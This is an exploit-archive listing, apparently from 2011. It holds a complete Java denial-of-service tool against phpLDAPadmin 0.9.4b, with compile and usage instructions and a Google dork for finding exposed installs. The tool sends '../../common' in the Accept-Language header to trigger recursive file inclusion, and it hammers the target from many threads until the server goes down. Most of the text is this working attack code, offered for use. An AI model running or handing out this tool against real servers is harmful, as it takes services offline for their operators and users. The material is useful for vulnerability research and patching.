[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpLDAPadmin 0.9.4b DoS
# Published : 2011-10-23
# Author :
# Previous Title : PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities
# Next Title : Metasploit 4.1.0 Web UI stored XSS Vulnerability
/**
* Exploit Title: phpLDAPadmin 0.9.4b DoS
* Google Dork: "phpLDAPadmin - 0.9.4b"
* Date: 2011-10-23
* Author: Alguien
* Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/
* Version: 0.9.4b
* Tested on: Red Hat
* CVE : -
*
* Compilation:
* ------------
* $ javac phpldos.java
*
* Usage:
* ------
* $ java phpldos <host> <path> <threads>
*
* Example:
* --------
* $ java phpldos www.example.com /phpldapadmin/ 10
*
* Explanation:
* ------------
* The file "common.php" is vulnerable to LFI through the "Accept-Language"
* HTTP header.
*
* if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
* // get the languages which are spetcified in the HTTP header
* $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
* $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
* foreach( $HTTP_LANGS2 as $key => $value ) {
* $value=preg_split ("/[-]+/", $value );
* $HTTP_LANGS2[$key]=$value[0];
* }
*
* $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2);
* foreach( $HTTP_LANGS as $HTTP_LANG) {
* // try to grab one after the other the language file
* if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) &&
* is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) {
* ob_start();
* include realpath( "lang/recoded/$HTTP_LANG.php" );
* ob_end_clean();
* break;
* }
* }
* }
*
* This exploit sends "../../common" in the Accept-Language header in order to
* generate a recursive inclusions and cause a denial of service via resource
* exhaustion.
*
* GET /phpldapadmin/common.php HTTP/1.1rn
* Host: www.example.comrn
* Accept-Language: ../../commonrn
* Connection: closern
* rn
*
*/
import java.io.PrintStream;
import java.net.InetSocketAddress;
import java.net.Socket;
class phpldos implements Runnable {
public static final int HTTP_PORT = 80;
public static final int TIMEOUT = 10000;
private static String host;
private static String path;
private Socket sk;
private PrintStream ps;
public void run() {
while (true) {
if (!open_connection()) {
System.out.println("[+] Mission complete. Server is down };]");
break;
}
send_attack();
try {
ps.close();
sk.close();
} catch (Exception e) {
// D'oh!
}
}
}
private boolean open_connection() {
try {
sk = new Socket();
sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT);
ps = new PrintStream(sk.getOutputStream());
} catch (Exception e) {
return false;
}
return true;
}
private void send_attack() {
try {
String message = ""
+ "GET " + path + "common.php HTTP/1.1rn"
+ "Host: " + host + "rn"
+ "Accept-Language: ../../commonrn"
+ "Connection: closern"
+ "rn";
ps.print(message);
} catch (Exception e) {
// D'oh!
}
}
public static void main(String[] args) {
if (args.length != 3) {
usage();
}
host = args[0];
path = args[1];
int threads = Integer.parseInt(args[2]);
System.out.println("[+] Attacking with " + threads + " threads.");
for (int i = 0; i < threads; i++) {
new Thread(new phpldos()).start();
}
}
public static void usage() {
System.out.print(
"###########################################################n"
+ "# phpLDAPadmin DoS #n"
+ "# by: Alguien - http://alguienenlafisi.blogspot.com #n"
+ "###########################################################n"
+ "Syntax : java phpldos <host> <path> <threads>n"
+ "Example : java phpldos www.example.com /phpldapadmin/ 10nn");
System.exit(1);
}
}